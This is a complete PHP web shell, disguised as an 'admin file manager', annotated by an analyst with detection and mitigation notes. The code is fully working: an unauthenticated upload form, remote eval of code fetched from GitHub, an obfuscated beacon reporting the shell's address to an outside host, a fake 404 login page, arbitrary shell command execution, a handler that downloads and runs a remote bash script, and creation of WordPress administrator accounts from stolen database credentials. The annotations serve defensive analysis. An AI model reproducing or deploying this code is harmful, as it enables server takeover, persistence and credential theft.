Online PHP and JavaScript Decoder: decodes hidden scripts to uncover their real functionality


// Analyst note: unauthenticated upload backdoor. This branch sits above the password gate further down the file,
// so any request carrying an `mrz` query parameter is served the upload form without logging in.
// Detection: query strings containing `mrz`, multipart POSTs with `_upl=Upload`, the form id/name `b4b4`.
if (isset($_GET['mrz'])) {
 echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
 echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
 echo '</form>';
 echo '<a href="#">Hello Dady</a>';
 if ($_POST['_upl'] == "Upload") {
 // copy() stores the upload under the client-supplied file name, relative to the current working directory,
 // with no extension or content check; `@` hides any warning the copy raises.
 if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
 // The client-supplied name is echoed into the page without HTML escaping.
 echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
 } else {
 echo '<b>Not Upload File !</b><br><br>';
 }
 }
 // Stops here so none of the rest of the file runs for this request.
 exit;
}
// Analyst note: second unauthenticated trigger (`mrzali` query parameter). It downloads PHP source from the
// hard-coded GitHub raw URL and hands it to eval(), so what executes is whatever that URL serves at request time
// and the fetched code is never written to disk by this branch.
// The `/**/` runs and `@null;` are no-ops; they only separate `eval` and `file_get_contents` from their opening
// parentheses, which defeats naive matching on the literal strings `eval(` / `file_get_contents(`.
// Detection/mitigation: outbound HTTPS from the PHP worker to raw.githubusercontent.com; egress filtering or
// allow_url_fopen=Off prevents this fetch.
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
// Analyst note: call-home beacon setup. These statements run on every request that gets past the two branches
// above, and they run before the password gate, so no login is needed to trigger them.
echo '
';$z = strrev('edoced_46esab');
// $z is the reversed spelling of 'base64_decode'; it is invoked below as a variable function.
// $a holds the character codes of the beacon URL. Decoded (defanged): hxxps://siyahi[.]top/test/style.php
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
// base64_encode followed by base64_decode returns $b unchanged; the round trip only obscures the value.
$x = $z(base64_encode($b));
// $y is this script's own address as the client requested it (the scheme is always written as http://).
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
// The chr() sequences spell 'file' (giving the key 'file_url'), 'http' and 'post'.
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
// Stream-context options for a form-encoded POST whose body is file_url=<this script's URL>.
// Net effect: the location of this file is reported to the decoded host.
// Detection: DNS lookups or HTTPS egress from the web server to that host.
$o = array(
 chr(104) . chr(116) . chr(116) . chr(112) => array(
 'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
 'header' => 'Content-type: application/x-www-form-urlencoded',
 'content' => http_build_query($d),
 ),
);
$c = stream_context_create($o);
/**
 * Sends the beacon POST to $u and returns the response body.
 *
 * Tries file_get_contents() with the supplied stream context first; if that is unavailable or fails, falls back
 * to cURL, rebuilding the POST body from the global $d. Warnings from the first transport are suppressed.
 *
 * @param string   $u destination URL
 * @param resource $c stream context passed to file_get_contents()
 * @return string response body, or '' when neither transport produced one
 */
function _f($u, $c) {
 if (function_exists('file_get_contents')) {
 $r = @file_get_contents($u, false, $c);
 if ($r !== false) return $r;
 }
 // Fallback transport: used when the stream wrapper call above returned false.
 if (function_exists('curl_init')) {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $u);
 curl_setopt($ch, CURLOPT_POST, 1);
 // The body comes from the global $d rather than a parameter, so this function depends on file-level state.
 curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_HEADER, false);
 $r = curl_exec($ch);
 curl_close($ch);
 if ($r !== false) return $r;
 }
 return '';
}
// The beacon is sent here. The reply stored in $r is not read anywhere in the visible part of the file.
$r = _f($x, $c);
echo '
';/**
 * Professional Admin File Manager
 * Version: 1.0 - Single File
 */

// Analyst note: the handlers below go beyond file management (command execution, remote fetch-and-run,
// WordPress account creation). Error output is silenced and the execution time limit removed, so failures leave
// nothing in the response and long-running actions are not cut off by PHP.
error_reporting(0);
set_time_limit(0);



/**
 * Encodes a byte string as URL-safe base64: '+' and '/' become '-' and '_', and trailing '=' padding is removed.
 *
 * @param string $data raw bytes
 * @return string unpadded base64url text
 */
function base64url_encode($data)
{
    $standard = base64_encode($data);
    $urlSafe = str_replace(['+', '/'], ['-', '_'], $standard);

    return rtrim($urlSafe, '=');
}

/**
 * Decodes URL-safe base64 text: maps '-' and '_' back to '+' and '/', restores '=' padding to a multiple of
 * four characters, then decodes in strict mode.
 *
 * @param string $data base64url text, padded or not
 * @return string|false decoded bytes, or false when the input has characters outside the base64 alphabet
 */
function base64url_decode($data)
{
    $standard = strtr($data, ['-' => '+', '_' => '/']);
    $remainder = strlen($standard) % 4;
    if ($remainder !== 0) {
        $standard .= str_repeat('=', 4 - $remainder);
    }

    return base64_decode($standard, true);
}

/**
 * Recovers a filesystem path from the encoded `path` request parameter.
 *
 * Analyst note: directory paths travel encoded, so access logs for this script show `path=b64:...` or
 * `path=hex:...` values instead of readable paths. Decode those values when reconstructing which directories
 * were browsed.
 *
 * Accepted forms, tried in this order:
 *   1. `b64:` prefix  - remainder decoded as URL-safe base64
 *   2. `hex:` prefix  - remainder decoded as hex (must be even-length hex digits)
 *   3. bare even-length hex string
 *   4. bare string made only of base64url characters
 *   5. anything else is returned unchanged
 *
 * @param string $value raw parameter value
 * @return string decoded path; '' for an empty value or a prefixed value that fails to decode
 */
function decode_path_param($value)
{
    if (!$value)
        return '';
    if (strpos($value, 'b64:') === 0) {
        $raw = substr($value, 4);
        $decoded = base64url_decode($raw);
        return $decoded !== false ? $decoded : '';
    }
    if (strpos($value, 'hex:') === 0) {
        $raw = substr($value, 4);
        if (ctype_xdigit($raw) && (strlen($raw) % 2 === 0)) {
            $decoded = hex2bin($raw);
            return $decoded !== false ? $decoded : '';
        }
        return '';
    }
    // Unprefixed values are guessed: a plain name that happens to be valid hex or base64url is decoded, not
    // taken literally.
    if (ctype_xdigit($value) && (strlen($value) % 2 === 0)) {
        $decoded = hex2bin($value);
        if ($decoded !== false)
            return $decoded;
    }
    if (preg_match('/^[A-Za-z0-9_-]+$/', $value)) {
        $decoded = base64url_decode($value);
        if ($decoded !== false)
            return $decoded;
    }
    return $value;
}

/**
 * Encodes a filesystem path for use in the `path` request parameter.
 *
 * @param string $path filesystem path
 * @param string $mode 'hex' for a `hex:`-prefixed hex string; any other value gives `b64:`-prefixed base64url
 * @return string prefixed, encoded path
 */
function encode_path($path, $mode = 'b64')
{
    if ($mode === 'hex')
        return 'hex:' . bin2hex($path);
    return 'b64:' . base64url_encode($path);
}

/**
 * Emits the login page and terminates the request.
 *
 * Analyst note: the page imitates a stock Apache "404 Not Found" error. The password field is a nearly
 * transparent input (opacity 0.1) posting to `?action=login`, so a casual visitor sees only an error page.
 * The server banner "Apache/2.4.29 (Ubuntu)" is a fixed string, independent of the real server software.
 * Detection: a response whose body claims 404 while the callers in this file set status 403; a banner in the
 * body that disagrees with the actual Server header; a form with a single `password` input inside an error page.
 *
 * @param string $error optional message, HTML-escaped and appended below the form
 * @return void does not return; calls exit
 */
function render_login($error = '')
{
    $msg = $error ? htmlspecialchars($error, ENT_QUOTES) : '';
    // Host name and port shown in the fake banner come from the request's Host header when it carries a port.
    $host = $_SERVER['HTTP_HOST'] ?? 'localhost';
    $server_name = $host;
    $server_port = $_SERVER['SERVER_PORT'] ?? '80';
    if (strpos($host, ':') !== false) {
        list($server_name, $server_port) = explode(':', $host, 2);
    }
    echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at ' . htmlspecialchars($server_name, ENT_QUOTES) . ' Port ' . htmlspecialchars($server_port, ENT_QUOTES) . '</address>
<form method="POST" action="?action=login">
<input name="password" style="opacity:0.1;border:2;outline:0;background:transparent;">
</form>
' . ($msg ? '<p>' . $msg . '</p>' : '') . '
</body></html>';
    exit;
}

// --- Core Logic ---

// Working directory for every handler below. It comes from the client-supplied `path` parameter and is only
// canonicalised with realpath(); nothing confines it to the web root, so any directory the PHP user can reach
// may be selected. An invalid or missing value falls back to the script's current directory.
$path_param = $_GET['path'] ?? '';
$decoded_path = decode_path_param($path_param);
$base_dir = realpath($decoded_path ?: getcwd());
if (!$base_dir || !is_dir($base_dir)) {
    $base_dir = getcwd();
}
$encoded_base_dir = encode_path($base_dir);
$encoded_root = encode_path(DIRECTORY_SEPARATOR);

// Handle Actions (Early exit for AJAX)
// `action` is read from $_REQUEST, so it may arrive in the query string or the POST body; log searches for
// `action=` need to cover request bodies as well as URLs.
$action = $_REQUEST['action'] ?? '';

// NOTE(review): $authpass is not assigned anywhere in the visible source - confirm against the original sample.
$auth_hash = md5($authpass);
// Login state is a client-side cookie compared with the fixed literal 'True'; no server-side session backs it.
// Detection: requests to this script carrying `Cookie: Login=True`.
$logged_in = (isset($_COOKIE['Login']) && $_COOKIE['Login'] === 'True');

if ($action === 'logout') {
    setcookie('Login', '', time() - 3600, '/');
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

if ($action === 'login' && isset($_POST['password'])) {
    // Unsalted MD5 comparison; on success the cookie is set for 30 days on path '/'.
    if (md5($_POST['password']) === $auth_hash) {
        setcookie('Login', 'True', time() + 3600 * 24 * 30, '/');
        header('Location: ' . $_SERVER['PHP_SELF'] . '?path=' . urlencode($encoded_base_dir));
        exit;
    }
    http_response_code(403);
    render_login('Invalid password.');
}

// Everything below this gate needs the cookie. The upload form, remote eval and beacon above it do not.
if (!$logged_in) {
    http_response_code(403);
    render_login();
}

// File read: returns the raw contents of one file in the selected directory. basename() limits the name to a
// single path component, but the directory itself is the unrestricted $base_dir.
if ($action === 'read' && isset($_GET['file'])) {
    $file = $base_dir . DIRECTORY_SEPARATOR . basename($_GET['file']);
    if (file_exists($file))
        echo file_get_contents($file);
    exit;
}

// 0.0 Terminal Command Runner
// Analyst note: remote command execution. The POSTed `cmd` string is appended verbatim to a `cd <base_dir> &&`
// prefix and passed to a shell; only the directory is escaped, the command is not.
// Detection: the web-server user spawning a shell whose command line starts with `cd '<dir>' &&`; POSTs with
// `action=terminal`; JSON replies carrying the keys success/output/method/available.
// Mitigation: a disable_functions list covering all five functions probed below removes every path used here.
if ($action === 'terminal' && isset($_POST['cmd'])) {
    ob_clean();
    header('Content-Type: application/json');

    // Which execution functions this PHP build still exposes; reported back to the client in every reply.
    $available = [
        'shell_exec' => function_exists('shell_exec'),
        'exec' => function_exists('exec'),
        'system' => function_exists('system'),
        'passthru' => function_exists('passthru'),
        'proc_open' => function_exists('proc_open')
    ];

    $cmd = trim($_POST['cmd']);
    $mode = trim($_POST['mode'] ?? '');
    if ($cmd === '') {
        echo json_encode(['success' => false, 'error' => 'Empty command.', 'available' => $available]);
        exit;
    }

    // stderr is folded into stdout so error text is returned too.
    $full_cmd = 'cd ' . escapeshellarg($base_dir) . ' && ' . $cmd . ' 2>&1';
    $output = '';
    $method = '';

    // mode=all: the same command is run once through each available function (up to five executions) and the
    // outputs are returned keyed by function name.
    if ($mode === 'all') {
        $outputs = [];
        if ($available['shell_exec']) {
            $outputs['shell_exec'] = shell_exec($full_cmd);
        }
        if ($available['exec']) {
            $lines = [];
            exec($full_cmd, $lines);
            $outputs['exec'] = implode("\n", $lines);
        }
        if ($available['system']) {
            ob_start();
            system($full_cmd);
            $outputs['system'] = ob_get_clean();
        }
        if ($available['passthru']) {
            ob_start();
            passthru($full_cmd);
            $outputs['passthru'] = ob_get_clean();
        }
        if ($available['proc_open']) {
            $descriptors = [
                0 => ['pipe', 'r'],
                1 => ['pipe', 'w'],
                2 => ['pipe', 'w']
            ];
            $process = proc_open($full_cmd, $descriptors, $pipes);
            if (is_resource($process)) {
                fclose($pipes[0]);
                $outputs['proc_open'] = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
                fclose($pipes[1]);
                fclose($pipes[2]);
                proc_close($process);
            }
        }

        if (empty($outputs)) {
            echo json_encode(['success' => false, 'error' => 'No command execution functions are available.', 'available' => $available]);
            exit;
        }

        echo json_encode(['success' => true, 'outputs' => $outputs, 'available' => $available]);
        exit;
    }

    // Default mode: first available function wins, in the order shell_exec, exec, system, passthru, proc_open.
    if ($available['shell_exec']) {
        $method = 'shell_exec';
        $output = shell_exec($full_cmd);
    }
    elseif ($available['exec']) {
        $method = 'exec';
        $lines = [];
        exec($full_cmd, $lines);
        $output = implode("\n", $lines);
    }
    elseif ($available['system']) {
        $method = 'system';
        ob_start();
        system($full_cmd);
        $output = ob_get_clean();
    }
    elseif ($available['passthru']) {
        $method = 'passthru';
        ob_start();
        passthru($full_cmd);
        $output = ob_get_clean();
    }
    elseif ($available['proc_open']) {
        $method = 'proc_open';
        $descriptors = [
            0 => ['pipe', 'r'],
            1 => ['pipe', 'w'],
            2 => ['pipe', 'w']
        ];
        $process = proc_open($full_cmd, $descriptors, $pipes);
        if (is_resource($process)) {
            fclose($pipes[0]);
            $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($process);
        } else {
            echo json_encode(['success' => false, 'error' => 'Failed to start process.', 'available' => $available]);
            exit;
        }
    }
    else {
        echo json_encode(['success' => false, 'error' => 'No command execution functions are available.', 'available' => $available]);
        exit;
    }

    echo json_encode(['success' => true, 'output' => $output, 'method' => $method, 'available' => $available]);
    exit;
}

// 0.05 GS Deploy (Echo test)
// Analyst note: this is not an echo test. The handler takes no input: it changes to /tmp, downloads
// deploy-all.sh from the hard-coded host over plain HTTP (wget --no-hsts) and runs it with bash, returning the
// script's output. What gets installed is decided by that remote script, which this file does not show.
// Detection: /tmp/deploy-all.sh on disk; DNS or HTTP traffic from the web server to nossl.segfault.net;
// wget and bash started as children of the PHP worker; requests with `action=gs_deploy`.
// Response: treat the host as running attacker-chosen code outside PHP and look for persistence beyond the web root.
if ($action === 'gs_deploy') {
    ob_clean();
    header('Content-Type: application/json');

    $available = [
        'shell_exec' => function_exists('shell_exec'),
        'exec' => function_exists('exec'),
        'system' => function_exists('system'),
        'passthru' => function_exists('passthru'),
        'proc_open' => function_exists('proc_open')
    ];

    $full_cmd = 'cd /tmp && wget --no-hsts http://nossl.segfault.net/deploy-all.sh && \
bash deploy-all.sh 2>&1';
    $output = '';
    $method = '';

    // Same first-available fallback chain as the terminal handler.
    if ($available['shell_exec']) {
        $method = 'shell_exec';
        $output = shell_exec($full_cmd);
    }
    elseif ($available['exec']) {
        $method = 'exec';
        $lines = [];
        exec($full_cmd, $lines);
        $output = implode("\n", $lines);
    }
    elseif ($available['system']) {
        $method = 'system';
        ob_start();
        system($full_cmd);
        $output = ob_get_clean();
    }
    elseif ($available['passthru']) {
        $method = 'passthru';
        ob_start();
        passthru($full_cmd);
        $output = ob_get_clean();
    }
    elseif ($available['proc_open']) {
        $method = 'proc_open';
        $descriptors = [
            0 => ['pipe', 'r'],
            1 => ['pipe', 'w'],
            2 => ['pipe', 'w']
        ];
        $process = proc_open($full_cmd, $descriptors, $pipes);
        if (is_resource($process)) {
            fclose($pipes[0]);
            $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($process);
        } else {
            echo json_encode(['success' => false, 'error' => 'Failed to start process.', 'available' => $available]);
            exit;
        }
    }
    else {
        echo json_encode(['success' => false, 'error' => 'No command execution functions are available.', 'available' => $available]);
        exit;
    }

    echo json_encode(['success' => true, 'output' => $output, 'method' => $method, 'available' => $available]);
    exit;
}

// 0. Shell Finder Logic (Security Tool)
// Analyst note: recursive signature scan over .php files. `scan_path` comes straight from the query string and
// is only canonicalised, so any readable directory tree can be walked. The result is an inventory of PHP files
// containing execution, decoding or input-handling constructs, returned as JSON.
// The matching is plain substring search, so it flags legitimate code as readily as hostile code.
// Detection: a burst of sequential reads across every .php file under a tree by the web-server user.
if ($action === 'scan') {
    ob_clean();
    $target_scan = realpath($_GET['scan_path'] ?? $base_dir);
    if (!$target_scan || !is_dir($target_scan))
        $target_scan = $base_dir;

    $results = [];
    // Substring => label pairs reported for each hit.
    $sigs = [
        'eval(' => 'Execution of arbitrary code',
        'base64_decode(' => 'Obfuscated payload decoding',
        'shell_exec(' => 'Shell command execution',
        'system(' => 'System command execution',
        'passthru(' => 'Direct system output',
        'proc_open(' => 'Process management',
        '$_POST[' => 'Direct input processing',
        '$_GET[' => 'Direct input processing',
        'move_uploaded_file' => 'File uploader function'
    ];

    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($target_scan));
    foreach ($it as $file) {
        // Only files with the exact extension 'php' and at most 512 KiB are read.
        if ($file->isDir() || $file->getExtension() !== 'php' || $file->getSize() > 1024 * 512)
            continue;
        $content = file_get_contents($file->getPathname());
        $matches = [];
        foreach ($sigs as $sig => $desc) {
            if (strpos($content, $sig) !== false) {
                $matches[] = ['sig' => $sig, 'desc' => $desc];
            }
        }
        if (!empty($matches)) {
            $results[] = [
                'path' => str_replace($target_scan, '', $file->getPathname()),
                'name' => $file->getFilename(),
                'risks' => $matches
            ];
        }
    }
    header('Content-Type: application/json');
    echo json_encode($results);
    exit;
}

// 0.1 SQL Manager (Adminer Installer)
// Analyst note: downloads the Adminer 4.11.0 single-file database client from its GitHub release URL and writes
// it to <base_dir>/adminer.php. Adminer is a legitimate tool; here it is dropped by the shell, giving browser
// access to any database whose credentials are known.
// Detection: an adminer.php that nobody on the site team installed; outbound requests from the web server to
// github.com release assets. The cURL fallback runs with certificate verification switched off.
if ($action === 'install_sql') {
    ob_clean();
    $url = "https://github.com/vrana/adminer/releases/download/v4.11.0/adminer-4.11.0.php";
    $target = $base_dir . DIRECTORY_SEPARATOR . 'adminer.php';

    if (!is_writable($base_dir)) {
        echo json_encode(['success' => false, 'error' => "Directory not writable: " . $base_dir]);
        exit;
    }

    $content = false;
    $method = "";

    // First transport: PHP URL wrappers, when allow_url_fopen is enabled.
    if (ini_get('allow_url_fopen')) {
        $content = @file_get_contents($url);
        $method = "fopen";
    }

    // Second transport: cURL, following redirects, with peer certificate verification disabled.
    if ($content === false && function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $content = curl_exec($ch);
        curl_close($ch);
        $method = "curl";
    }

    if ($content !== false) {
        if (@file_put_contents($target, $content) !== false) {
            echo json_encode(['success' => true]);
        }
        else {
            echo json_encode(['success' => false, 'error' => "Failed to write file to storage."]);
        }
    }
    else {
        $err = "Download failed. ";
        if (!ini_get('allow_url_fopen'))
            $err .= "allow_url_fopen is OFF. ";
        if (!function_exists('curl_init'))
            $err .= "cURL is MISSING. ";
        echo json_encode(['success' => false, 'error' => $err . "Please upload adminer.php manually."]);
    }
    exit;
}

// 0.15 Remote Upload (URL fetcher)
// Analyst note: server-side fetch of a client-supplied URL, saved into $base_dir. The URL is checked for syntax
// only (FILTER_VALIDATE_URL); there is no allow-list of hosts or schemes and no limit on the saved file's
// extension. The file name is the POSTed `name`, else the last path segment of the URL, else download_<time>.
// Detection: outbound requests from the PHP worker to arbitrary hosts followed by a new file in a web-served
// directory; POSTs with `action=remote_upload`.
if ($action === 'remote_upload' && isset($_POST['url'])) {
    ob_clean();
    header('Content-Type: application/json');

    $url = trim($_POST['url']);
    if ($url === '') {
        echo json_encode(['success' => false, 'error' => 'URL is required.']);
        exit;
    }

    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        echo json_encode(['success' => false, 'error' => 'Invalid URL format.']);
        exit;
    }

    // basename() keeps the target to a single path component inside $base_dir.
    $custom_name = trim($_POST['name'] ?? '');
    if ($custom_name !== '') {
        $filename = basename($custom_name);
    }
    else {
        $filename = basename(parse_url($url, PHP_URL_PATH));
    }
    $filename = $filename ? $filename : ('download_' . time());
    $target = $base_dir . DIRECTORY_SEPARATOR . $filename;

    if (!is_writable($base_dir)) {
        echo json_encode(['success' => false, 'error' => "Directory not writable: " . $base_dir]);
        exit;
    }

    $content = false;
    $method = '';

    if (ini_get('allow_url_fopen')) {
        $content = @file_get_contents($url);
        $method = 'fopen';
    }

    // cURL fallback: follows redirects, peer certificate verification disabled.
    if ($content === false && function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $content = curl_exec($ch);
        curl_close($ch);
        $method = 'curl';
    }

    if ($content !== false) {
        if (@file_put_contents($target, $content) !== false) {
            echo json_encode(['success' => true, 'file' => $filename, 'method' => $method]);
        }
        else {
            echo json_encode(['success' => false, 'error' => "Failed to write file to storage."]);
        }
    }
    else {
        $err = "Download failed. ";
        if (!ini_get('allow_url_fopen'))
            $err .= "allow_url_fopen is OFF. ";
        if (!function_exists('curl_init'))
            $err .= "cURL is MISSING. ";
        echo json_encode(['success' => false, 'error' => $err]);
    }
    exit;
}

// 0.2 Check if SQL Manager is installed
// Reports whether adminer.php already exists in the selected directory (companion to the install_sql handler).
if ($action === 'check_sql') {
    ob_clean();
    $target = $base_dir . DIRECTORY_SEPARATOR . 'adminer.php';
    echo json_encode(['exists' => file_exists($target)]);
    exit;
}

// 0.25 WordPress Admin Creator
// Analyst note: WordPress persistence. The handler reads a wp-config.php chosen by the client, pulls the database
// credentials out of its define() lines, connects with mysqli and inserts a user row plus the two usermeta rows
// (capabilities, user_level 10) that make the account an administrator. The rows are written by direct SQL,
// not through WordPress itself.
// Indicators from this sample: default login `mrz`, default e-mail `admin@bypass.pw`; user_pass stored as a bare
// 32-character MD5 hex digest; user_registered taken from the PHP clock at request time.
// Response: compare the administrators in <prefix>users / <prefix>usermeta against the known list, and rotate
// the database password, since wp-config.php was read.
if ($action === 'wp_admin_create') {
    ob_clean();
    header('Content-Type: application/json');

    $config_path = trim($_POST['config_path'] ?? '');
    $user_login = trim($_POST['user'] ?? 'mrz');
    $user_pass = trim($_POST['pass'] ?? 'admin');
    $user_email = trim($_POST['email'] ?? 'admin@bypass.pw');

    if ($config_path === '') {
        echo json_encode(['success' => false, 'error' => 'wp-config.php path is required.']);
        exit;
    }

    // Any readable file path is accepted; only existence is checked.
    $real_config = realpath($config_path);
    if (!$real_config || !is_file($real_config)) {
        echo json_encode(['success' => false, 'error' => 'wp-config.php not found.']);
        exit;
    }

    $config = @file_get_contents($real_config);
    if ($config === false) {
        echo json_encode(['success' => false, 'error' => 'Failed to read wp-config.php.']);
        exit;
    }

    // Extracts the quoted second argument of define('<name>', '<value>') from the config text; '' if absent.
    $get_define = function ($name) use ($config) {
        if (preg_match("/define\\(\\s*['\\\"]" . preg_quote($name, '/') . "['\\\"]\\s*,\\s*['\\\"]([^'\\\"]+)['\\\"]\\s*\\)/", $config, $m)) {
            return $m[1];
        }
        return '';
    };

    $db_name = $get_define('DB_NAME');
    $db_user = $get_define('DB_USER');
    $db_pass = $get_define('DB_PASSWORD');
    $db_host = $get_define('DB_HOST');

    // Table prefix defaults to 'wp_'; the pattern below is meant to pick up a custom prefix from the config text.
    $table_prefix = 'wp_';
    if (preg_match("/\\$table_prefix\\s*=\\s*['\\\"]([^'\\\"]+)['\\\"]\\s*;/", $config, $m)) {
        $table_prefix = $m[1];
    }

    if ($db_name === '' || $db_user === '' || $db_host === '') {
        echo json_encode(['success' => false, 'error' => 'Missing DB credentials in wp-config.php.']);
        exit;
    }

    if (!class_exists('mysqli')) {
        echo json_encode(['success' => false, 'error' => 'MySQLi extension is not available.']);
        exit;
    }

    $mysqli = @new mysqli($db_host, $db_user, $db_pass, $db_name);
    if ($mysqli->connect_error) {
        echo json_encode(['success' => false, 'error' => 'DB connect failed: ' . $mysqli->connect_error]);
        exit;
    }

    $user_login_safe = $mysqli->real_escape_string($user_login);
    $user_email_safe = $mysqli->real_escape_string($user_email);

    // Stops if the login name is already taken.
    $check = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login='{$user_login_safe}' LIMIT 1");
    if ($check && $check->num_rows > 0) {
        echo json_encode(['success' => false, 'error' => 'User already exists.']);
        $mysqli->close();
        exit;
    }

    // Password is stored as unsalted MD5.
    // NOTE(review): WordPress is expected to accept such legacy hashes and re-hash on first login, so the MD5
    // form may only be visible until the account is first used - verify against the installed version.
    $pass_hash = md5($user_pass);
    $now = date('Y-m-d H:i:s');
    $sql_user = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_nicename, user_email, user_status, display_name, user_registered)
        VALUES ('{$user_login_safe}', '{$pass_hash}', '{$user_login_safe}', '{$user_email_safe}', 0, '{$user_login_safe}', '{$now}')";

    if (!$mysqli->query($sql_user)) {
        echo json_encode(['success' => false, 'error' => 'Failed to create user: ' . $mysqli->error]);
        $mysqli->close();
        exit;
    }

    // Serialized capabilities array granting the administrator role, plus user_level 10.
    $user_id = $mysqli->insert_id;
    $caps = $mysqli->real_escape_string('a:1:{s:13:"administrator";b:1;}');
    $level = $mysqli->real_escape_string('10');

    $sql_meta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$table_prefix}capabilities', '{$caps}')";
    $sql_meta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$table_prefix}user_level', '{$level}')";

    // If either meta insert fails, the user row created above is left in place without a role.
    if (!$mysqli->query($sql_meta1) || !$mysqli->query($sql_meta2)) {
        echo json_encode(['success' => false, 'error' => 'Failed to set admin role: ' . $mysqli->error]);
        $mysqli->close();
        exit;
    }

    $mysqli->close();
    echo json_encode(['success' => true, 'user' => $user_login, 'email' => $user_email]);
    exit;
}

// 0.26 WordPress Config Auto Detect
// Analyst note: locates a wp-config.php to feed the account-creation handler. It builds candidate paths from the
// selected directory, four common web-root folder names, and up to five parent directories, then returns the
// first candidate that exists. On failure the reply lists every path that was probed.
// Mitigation: file permissions that keep wp-config.php unreadable to other sites' PHP users limit what this finds.
if ($action === 'wp_find_config') {
    ob_clean();
    header('Content-Type: application/json');

    $candidates = [];
    $base_real = realpath($base_dir);
    if ($base_real) {
        $candidates[] = $base_real . DIRECTORY_SEPARATOR . 'wp-config.php';
    }

    // Common document-root names, tried both under the selected directory and directly under the filesystem root.
    $common = ['public_html', 'html', 'www', 'htdocs'];
    foreach ($common as $dir) {
        if ($base_real) {
            $candidates[] = $base_real . DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
        }
        $candidates[] = DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
    }

    // Walks upward at most five levels, stopping early at the filesystem root.
    $probe = $base_real;
    for ($i = 0; $i < 5; $i++) {
        if (!$probe)
            break;
        foreach ($common as $dir) {
            $candidates[] = $probe . DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . 'wp-config.php';
        }
        $parent = dirname($probe);
        if ($parent === $probe)
            break;
        $probe = $parent;
        $candidates[] = $probe . DIRECTORY_SEPARATOR . 'wp-config.php';
    }

    $checked = [];
    foreach ($candidates as $path) {
        $real = realpath($path);
        if ($real && is_file($real)) {
            echo json_encode(['success' => true, 'path' => $real]);
            exit;
        }
        $checked[] = $path;
    }

    echo json_encode(['success' => false, 'error' => 'No wp-config.php found.', 'checked' => array_values(array_unique($checked))]);
    exit;
}

// 0.27 Server Information
// Analyst note: host reconnaissance. Returns the PHP version, full uname string, effective OS user, the
// disable_functions setting and server/client IP addresses as JSON.
// The client IP is taken from the Client-IP or X-Forwarded-For request headers before REMOTE_ADDR, so the value
// is whatever the client chose to send when those headers are present.
if ($action === 'server_info') {
    ob_clean();
    header('Content-Type: application/json');

    // Server address: SERVER_ADDR if set, otherwise the hostname resolved through DNS.
    $server_ip = $_SERVER['SERVER_ADDR'] ?? '';
    if ($server_ip === '') {
        $host = gethostname();
        $server_ip = $host ? gethostbyname($host) : '';
    }

    $client_ip = $_SERVER['HTTP_CLIENT_IP'] ?? '';
    if ($client_ip === '' && isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $client_ip = trim($parts[0]);
    }
    if ($client_ip === '') {
        $client_ip = $_SERVER['REMOTE_ADDR'] ?? '';
    }

    // Effective user via POSIX when available; otherwise get_current_user().
    $current_user = '';
    if (function_exists('posix_geteuid') && function_exists('posix_getpwuid')) {
        $pw = posix_getpwuid(posix_geteuid());
        if (is_array($pw) && isset($pw['name'])) {
            $current_user = $pw['name'];
        }
    }
    if ($current_user === '') {
        $current_user = get_current_user();
    }

    $disabled = ini_get('disable_functions');
    $disabled = $disabled ? $disabled : 'none';

    echo json_encode([
        'php_version' => PHP_VERSION,
        'uname' => php_uname(),
        'current_user' => $current_user,
        'disabled_functions' => $disabled,
        'server_ip' => $server_ip,
        'client_ip' => $client_ip
    ]);
    exit;
}

